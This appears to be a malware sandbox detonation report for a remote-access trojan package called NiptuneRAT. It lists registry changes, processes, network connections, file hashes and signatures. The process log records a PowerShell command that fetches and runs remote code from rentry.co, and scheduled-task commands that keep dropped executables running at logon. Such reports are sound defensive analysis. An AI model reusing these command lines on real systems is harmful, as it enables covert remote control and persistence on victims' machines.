| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\NiptuneRAT-main\" -spe -an -ai#7zMap21379:88:7zEvent29350
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe"
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe"
C:\Users\Admin\Desktop\$77NiptuneClient.exe
"C:\Users\Admin\Desktop\$77NiptuneClient.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat""
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell "irm rentry.co/System-Settings/raw | iex"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/System-Settings/raw | iex"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
"C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE"
C:\Users\Admin\AppData\Roaming\$77.exe
"C:\Users\Admin\AppData\Roaming\$77.exe"
C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
"C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe"
C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
"C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4f8ebf90-14cd-4bc7-b0be-fa6d0271da55}
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77TCPSVCS" /tr "C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE
C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 20.231.121.79:80 | N/A | tcp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.145.129:80 | rentry.co | tcp |
| US | 172.67.145.129:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 129.145.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| N/A | 127.0.0.1:1337 | N/A | tcp |
| US | 172.67.145.129:443 | rentry.co | tcp |
| US | 147.185.221.18:36538 | N/A | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | c52733885f1aa485683b9289c4b45519 |
| SHA1 | 07c3faeb48670485bbefa9e3c35fc24da4f9411a |
| SHA256 | ca9dcd616882b3031c86f962b5cce07187a8a513d183b4f68d897d5687d45bd7 |
| SHA512 | 5fe1f30b412459cc5d71cd426c2bba9265e6c8f4ade5ddda052fe231ca4e036598c873c40441045abe591b8fcc6e850c2d691b179e44f02f3ce23d0effa4a5c2 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | a6bf33461f36b6cc60df311818e13f16 |
| SHA1 | a18d8aec012db8d2b247b618087c860e134c7a57 |
| SHA256 | 7fb89d4f209ac6c6089783a2258a1b45d40686fb7624ad835263724e10477961 |
| SHA512 | 7faad74edc9282f3410fd3edcc8bedd4cba28fbb768b5c24cafa761503c7408b394296e905739f0105b76cde4fa24512cb2ea5610f4637a25de19f1792766ac0 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config
| MD5 | 465c8716dc52edeaf09f0c61fc988934 |
| SHA1 | 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b |
| SHA256 | 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5 |
| SHA512 | 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
| MD5 | 89974f21c462ad66165c03cc05a9b8a7 |
| SHA1 | 868b45d89fced9bf5cdc3e86e8eeb0698262deb4 |
| SHA256 | 9f61591699d7d9e3336bbe924e7826c1e8bedb7227045705d50eec264b1202ec |
| SHA512 | 7348faa61700741733da0b80fdb824366a7cb7d841c24d78d54971ba1d0fbe899f257f0c68792db5c1e05ca3afb4e6fbd251f8d369c903e227e9b7eba4f861b3 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe.config
| MD5 | 0c02012f18e2755ce1bfaa8c81abe14e |
| SHA1 | b10ef760340682f09360019ddca35a2bc0eef3e1 |
| SHA256 | 93b3433679ee8d782f69e37136e207bd5e125f1ef79542bf9d7e84c1c84feea5 |
| SHA512 | c1ad192d040288433b5a618720de46199c94c71b17c8365a16aa7180179c7efbc8ff77e590c1dcfc1e8d6caa1223446b9458663f5dc7ccd861ee3afb6bc99787 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
| MD5 | ab9b9dac5c176d3f525400aa7b58a078 |
| SHA1 | c7b22490b94d46ed0287c4b6ece08e96e7103516 |
| SHA256 | 6d9da9ac899fdac6a9436922be389ef3bd124f4657fea6332c2ccd3fc33613d4 |
| SHA512 | 649032f0046778fa63e7878ade222de7a061162b6da4670970ace517d2c2212f80dff2fd5a5f2d9c25324a89c5af0927022c1ec24f726da92a669cd232b8ec16 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe
| MD5 | 0da861f192f8e722505826c141c05a40 |
| SHA1 | 4d717f9d2a64caf68374ed1e246cf38dd208227b |
| SHA256 | 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b |
| SHA512 | 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12
| MD5 | 87f8c46f0f27b967b543ab554c061dbd |
| SHA1 | 78c88f30a8c3638b9c61d4c8044a9e4f8d7b00d3 |
| SHA256 | adf158702858e96c9003d5ab5115c6a1e71cdce8a82377e0d6c6e63edfb52239 |
| SHA512 | b289e2cf36684dad0f47cacd8716582e176ad71720f7a00fc508ec6eeb0266cdfcf58c7c62cddf4e0a03dc0fbe60e3a9c76da820eccf73f8c9a669252c17422c |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config
| MD5 | 77d636e08fe9de62cf19ad656409ccde |
| SHA1 | 827de958d0c46346c9c581be646b8c3a61fab648 |
| SHA256 | 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558 |
| SHA512 | 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839 |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config
| MD5 | 67ae3b067855a1e16f01e16ee389c8f0 |
| SHA1 | 3bef83c7922cda26497a45bbfe209e65b14234a0 |
| SHA256 | 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a |
| SHA512 | db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699 |
C:\Users\Admin\Desktop\$77NiptuneClient.exe
| MD5 | 9a545e9134023055aa55309e62f77a80 |
| SHA1 | 8f663c9816f8610676f4fc101cb6f31c21117d47 |
| SHA256 | 75bbbbeca7b8b6831e6bd91b7b7256c30a50de3369965f1866434a924f4c362e |
| SHA512 | d5d4dd237a03218d7c95f14160151e41adb89dd26192114efd9cc2b915e5fc006f2f4e2bf859c6cc1246f0584aa5f344d6b9525f3d31650719e8d4b66d838526 |
C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat
| MD5 | 7352cc373f53964e85cee69d5e6a96d5 |
| SHA1 | 267c8a9098dd1d4842f052126ea14b1f7fc8c973 |
| SHA256 | 4397f51ac52f558c35fa9181fe7519cdef892bf26d99af375fff5f50cdaaa346 |
| SHA512 | 78826b32baa2c2c5eec0ffbe3f0c65dfc5cf9b270f4ce0174bda794a2c881858fd1ee0a7fba10af952ee3e14609095c2b24046dc6575de9dcddf513d4e4d2c73 |
memory/3304-284-0x0000025878860000-0x0000025878882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nm1hmjww.bcx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
| MD5 | 0ccb78c036b77af2a02939c10863d0fc |
| SHA1 | 77b58cc239c67abf271a7e68c10592a8a4d5bae1 |
| SHA256 | 555e0c40af959eb3c9be32197ebf39aea443fe672086e004cc0141296de67d7a |
| SHA512 | 29f194f6118f558a31515538d758934d59959a9aeed1a2ae9e929b762166843a4433b10b0f5ded0698c141d36fc12ae54860ecbb8d36ba6ca2f92cb946f39a5c |
memory/2320-324-0x00000174250C0000-0x000001742520E000-memory.dmp
memory/4656-325-0x0000000000840000-0x0000000000874000-memory.dmp
memory/2320-326-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f62a904508f640cf7a29c69cdda7ed8e |
| SHA1 | 79e4bd22e96aa94c783f5521b5b2a549c58ed24f |
| SHA256 | 1c68a8d5fb2a3d57a9eaeb1e64cc457f3f4e268a54cbf8aeaf5084fd401e59bc |
| SHA512 | 0a5bdaf832544123470af0204145dc38830dbbf0e8b6623b89bbaca5970e5c0506356e4ad9d9a589bd3394768ff949215c3fea2d2542da16ffb60708c0f2c544 |
memory/3304-334-0x0000025878990000-0x0000025878ADE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 12b1823a0956e972f95e397d4ca5a91f |
| SHA1 | 1ad092456da4540400fd58788bc40a353b17e295 |
| SHA256 | 0096655234a74760fbeb882149ad2513be4c9782e1e8ca86968e61b9f88c5230 |
| SHA512 | 1bd8aa4179650510689ec523492c2327a61095c28266548d89512bc69b5b9b8416023e957a1ddfeefb51de2d403f525ee0535f850147b022568c44197fbcbcde |
C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
| MD5 | 152e3f07bbaf88fb8b097ba05a60df6e |
| SHA1 | c4638921bb140e7b6a722d7c4d88afa7ed4e55c8 |
| SHA256 | a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc |
| SHA512 | 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4 |
C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
| MD5 | 39b931afd01be1f696c515a83b789445 |
| SHA1 | 790083c555276c9cca5bf7a9532fd99f79b80a90 |
| SHA256 | e9db26ffe8f05c133a7c541ccd7eafa63b64806a84e4e5866fc735e5dc4ab93d |
| SHA512 | 0961ea8fa2b23f2c2631db074a2271d37bec1844496796ec116c649245423b7e7da29b9a626c3c6406a65f9812550f09f089babee9fe805dcf311f6d7bda9592 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll
| MD5 | 97b8bec4c47286e333cc2bedacf7338e |
| SHA1 | 764bbd0307924b71ca89538b42996208d10c9b91 |
| SHA256 | 060d467cbeb0a58696287c052f3dd9b3597331b1c812e3e2882d6c232f8511de |
| SHA512 | a40970622a594533349e75fc2022314ba21f05fc82709d6eaba82f4a2bc343c960029ad2825cfc034ce82622722127d149993bff88982f02d6dd6b5b1fb60fbf |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll
| MD5 | 0d41ccfaa8e7ef96248b8270d1a44d08 |
| SHA1 | 6ee22bdb91d3a18e0b45b6590eb69bc9a0b02326 |
| SHA256 | 0ea38d0d964815e2b84748a78bd5a829ae01586478e5f17b976f1ae763c8dec3 |
| SHA512 | a0f236f6dbeb1763fb1c198616de65b907a3a5edf7ed9435c2ad0b5826d84e9d2f25e96aba4e8b681ef495612cf0e04e929427a92d332164ace89e797bcb0e0e |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll
| MD5 | 64a3d908b8a5feff2bccfc67f3a67dbd |
| SHA1 | a17d7e5fa57c99a067cac459cb507b625dac254e |
| SHA256 | 6ea1ae7ab496666c0117fc20e704bfb6104b13cfb0408073a09689f863fa64b1 |
| SHA512 | 66374d720230799bea6ac6cfe3faadc37fd775a49d40c04facae1caf1ec658956bbda54ba75287d7128b19b97971bd933a64469da8e0884225c5a8d8b9423ccc |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll
| MD5 | 8105f5149e1fea72e27f0a1455d956bc |
| SHA1 | 6722d54df38b89284c3375efda3985155e6f5b8e |
| SHA256 | 9b73be7a27b5aa8cabf10c79a6e515db6b59962cad3945dada2eff57bb56bfdf |
| SHA512 | 4f1aaa81263bb17aa7b495cab056fd9b18058247df874866bd9cb6247f180989a0d549ce0b4595c7a636e4d6279e92004c4f159c30e8b381a1a51b9d54a84d10 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll
| MD5 | 86cbe0f36426982c534746743f4a4dfe |
| SHA1 | 04dd3bf828b36ae75bfda0edc67693b59801e9b5 |
| SHA256 | 972261dfbdd76a5b99d2922a018c5c809ddb195c4f44312bb1da496c9c28df44 |
| SHA512 | 1cd164585caa0c5f64e567d24f9e4f9c4a4f79fb1e8da83ef8a635d6ad5e2f6ebcf2c813371b4cd53ea94e0d36f8a04fa2b2acf3f35570ff57450d6503fc31a4 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll
| MD5 | e4ebcf76ff80ef398d3ab77d577f4c08 |
| SHA1 | cb9e6b30a63d50ae87610f6855b64abfb25691d2 |
| SHA256 | 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5 |
| SHA512 | 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 3e79e497a1c8dff282c0e281a8ac4238 |
| SHA1 | ca25ecd92033c4789f61dbbd0e782eac581a091c |
| SHA256 | edadb040867aacdc83bad794bdd55232320bb00ee4957b2217da614b26f158ea |
| SHA512 | 98cff43d464e17f18f7252f80e3f1105f4f048f83895ddca2e72c0b77dbe406ec104939737841e71eeb005e4ac83f7b6fb3789b115e2b0d91d78662009fe33d6 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win11-20240221-en
Max time kernel
440s
Max time network
454s
Command Line
Signatures
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
